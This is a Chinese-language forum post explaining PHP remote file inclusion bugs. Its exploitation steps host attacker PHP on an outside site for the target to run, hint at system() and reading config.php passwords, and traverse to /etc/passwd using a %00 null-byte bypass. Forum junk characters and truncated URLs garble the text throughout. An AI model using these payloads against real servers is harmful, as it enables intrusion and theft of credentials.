中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]

作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含

( Y7 |4 r0 g1 t2 |, E; Ephp远端档包含漏洞基本
5 |: i. ^) z9 @7 ]. ^这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。# s* d' O' A- a
本帖隐藏的内容需要回复才可以浏览
; R% `% J$ A  ?首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
3 g9 s' t$ J) j2 J$ T1 g) W1.找出bug:
4 y1 B" B0 B; X& _为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
/ x9 E2 y9 R1 M4 b* I7 b! ?如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
+ }+ w+ ~* \8 m' O2 W( X我们先看这个,当用户输入通过后就包含档,也就是3 {% o6 j( S% j, A0 Z
if ($_GET) {
7 x7 c4 x0 L1 A% R# v* z' rinclude $_GET;
' R: \$ L- \& J6 W; j1 Y$ N} else {
; R4 o' ]/ S, G/ |+ ]include "home.php";- C0 y0 j" i3 `7 v& m1 ?
}. Y+ A- ^& }9 p" m2 h
这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。0 j! F/ O( P2 Y) }# ^: C1 W: L, a
2.测试. m2 _/ H% z: v
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
, }$ a' n  I& x1 J! ohttp://www.target.com/explame.php?page=zizzy! P6 ^5 A1 I: [
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
- ^1 O+ p2 F1 N/ h% N/ u7 zWarning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
1 u# {, Q: \5 t9 W$ X  n/ `php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。1 S$ L1 [0 X, Z5 [) P; C0 j+ U+ O
3.利用1 f4 z0 T3 p, c
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样
+ O! n3 Y4 n: ?) r  k8 `<?
. j/ K( [+ n" x( v6 Eecho "Wow,test!";4 C& B5 o- v' a' x7 V9 N
?>4 h" ^- \3 U- W
那么http://www.target.com/explame.php?pa...e.com/yeah.txt$ K$ Y4 M6 u+ \* G$ t$ W
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。- ~2 [: J, I; n$ p
4.另一种
' h* G% K/ i. ]" i有时程式师换种写法,写成这样,限制了包含范围8 z6 `# m. Z- q
if ($_GET) {# i" n! m2 P1 }" X4 O. b& a- m- L
include "$_GET.php";
: t4 O! O& n5 g' h} else {. j& ~) m$ }6 v; g. b+ p& X
include "home.php";
, D' W, |7 U7 A) D, k}
: k2 z8 {$ K' k我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt" T/ ]) y/ \4 A  ]
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3# D, A  O7 D, T/ ]. j; ^
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3+ a2 J8 H& D9 }& A9 B
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
! q& H& L5 ?3 k6 j. _. l那passwd怎么办
5 ?8 _1 M$ X3 O- QWarning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3+ ]: b" E4 J5 P  v# a- ^$ j
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
% V. \7 |% ~9 b6 e# r  j; c在这里使用个NUL字元,也就是%00来跳过检测& \3 C) C5 \& Q9 H
http://www.target.com/explame.php?pa.../etc/passwd%00
: }  _, L( q$ U7 s+ s$ t3 K




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2